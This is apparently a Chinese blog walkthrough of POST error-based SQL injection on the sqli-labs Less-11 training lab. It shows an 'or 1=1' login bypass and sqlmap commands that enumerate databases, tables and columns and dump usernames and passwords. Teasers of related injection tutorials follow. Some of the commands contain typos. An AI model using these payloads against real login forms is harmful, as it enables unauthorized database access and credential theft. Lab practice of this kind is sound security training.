post 基於錯誤的注入 sqli lab

2021-10-19 11:54:15 字數 1033 閱讀 1227

get注入可以直接在url上進行傳輸引數。

post注入是基於輸入框進行注入,所以得使用輔助工具進行注入。

post注入的兩個前提:

1.輸入框可以互動

2.輸入的語句會進入到資料庫進行資訊查詢

下面我們用sqli-lab less11來舉乙個例子

我們注入乙個萬能密碼,or 1=1

可以看到已經進入資料庫

我們接下來用sqlmap進行探測。

1.首先我們先進行資料庫探測

sqlmap -r target.txt --current-db --technique e --batch

2.得到目前正在使用的資料庫名,檢視此資料庫表名。

sqlmap -r target.txt -d security --tables --technique e --batch

3.得到資料表之後我們對感興趣的資料進行字段收集

sqlmap -r target.txt -d security -t --cloumns --technique e --batch

4.進行使用者名稱和密碼探查

sqlmap -r target.txt -d security -t users -c 『username,psaaword』 --dump --technique e --batch

基於錯誤的SQL注入(union聯合注入)

mysql中比較常用的一些函式 version 查詢資料庫的版本 user 查詢資料庫的使用者 database 資料庫 system user 系統使用者名稱 session user 連線資料庫的使用者名稱 current user 當前使用者名稱 load file 讀取本地檔案 datadi...

基於錯誤回顯的sql注入整理

由於複習,停了好幾天,今天換換模式做了一下關於錯誤回顯的ctf題目,首先附上題目 here 0x00 關於錯誤回顯 用我自己的話來講,基於錯誤回顯的sql注入就是通過sql語句的矛盾性來使資料被回顯到頁面上 當然在實際應用中得能回顯在頁面上,一般的 都回避免這種情況,哈哈,要是能碰上你就偷著樂吧 0...

Web安全 基於SQLI的SQL時間盲注

通過本實驗理解sql時間盲注漏洞的定義方法,掌握基於sql時間盲注的手工注入方法,熟悉sql時間盲注存在的原因,掌握sql時間盲注的防護方法。目標靶機 sqli平台less 9 1.為什麼使用延時注入 1 部分 沒辦法 union select 聯合查詢方式注入 2 部分 沒有輸出顯示,只能通過延時...